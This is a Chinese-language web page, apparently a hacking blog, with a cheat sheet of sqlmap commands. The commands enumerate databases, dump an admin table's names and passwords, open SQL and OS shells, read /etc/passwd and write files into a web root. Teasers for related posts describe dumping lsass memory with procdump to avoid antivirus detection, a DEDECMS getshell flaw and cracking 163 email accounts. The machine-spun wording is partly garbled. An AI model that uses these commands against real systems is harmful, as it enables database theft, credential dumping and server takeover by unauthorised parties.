Sqlmap是一个技术专业的SQL引入专用工具,使用 *** 也许多,实际可以用"sqlmap -hh"查询详细的指令帮助文件,我这仅仅给大伙儿共享一些最常见的Sqlmap用法:
1、查验引入点
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11
2、爆全部数据库查询信息内容
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --dbs
爆当今数据库查询信息内容
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-db
3、列举特定数据库查询全部的表名
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D fujieace --tables
'fujieace' 为特定数据库查询名字
4、列举特定表名的全部字段名
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin --columns
'admin' 为特定表名字
5、dump输出打印表名特定列姓名段的值数据信息
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin -C name,password --dump
'name,password' 为特定字段称
1、列举数据库查询智能管理系统客户:
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --users
查询当今数据库连接客户:
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-user
2、分辨当今客户是不是DBA?
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --is-dba
3、查询用户权限:
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges -U fujieace
1、sql shell
这儿根据sqlmap能够立即获得一个sql shell,立即实行sql语句开展互动。
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --sql-shell
sql-shell> select version();
留意:这儿因为进入了sql shell能够实行sql语句了,还可以用 load data infile、load_file、into outfile等涵数来开展文档载入或载入;
2、cmd shell
这 里根据sqlmap能够立即获得一个cmd shell,立即实行cmd指令开展互动。
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-shell
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-cmd=ipconfig
3、载入 *** 服务器上特定文档
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=/etc/passwd
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=d:/test.txt
4、载入本地文件到 *** 服务器上
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-write /test/test.txt --file-dest /var/www/html/1.txt
使用procdump,由于是微软的东西,带微软签名杀软不会报毒。 procdump -accepteula -ma lsass.exe lsass.dmp copy出 ls...
漏洞原因:DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)目前只是测试过5.3到...
有时候我们入侵提完权后,3389端口开了,可还是没办法连3389,这是非常蛋疼的一件事。连不上通常用以下几种可能以及对应的解决办法。 提供一些思路和方法。 方法一:网站服务器在内网。...
黑客接单网:很多人不知道怎么破解邮箱,下面我来简单介绍一下: 我所讲的是用实际的例子来教大家,例子一,这是登陆163MAIL后产生的一个代码,就是它,包含了163邮箱使用者的 密码信息,对I...
什么是AppScan? AppScan在全部运用软件开发生命期中开展安全性测试,在设计阶段初期出示安全系数确保,并开展简单化单元测试卷。该专用工具能够扫描仪很多普遍的系统漏洞,比如HTTP回应切分,...
Nmap是一款网络扫描和服务器检验的十分有效的专用工具。 Nmap不是限于只是搜集信息内容和枚举类型,另外能够用于做为一个系统漏洞探测仪或安全性扫描枪。它能够适用winodws,linux,mac等...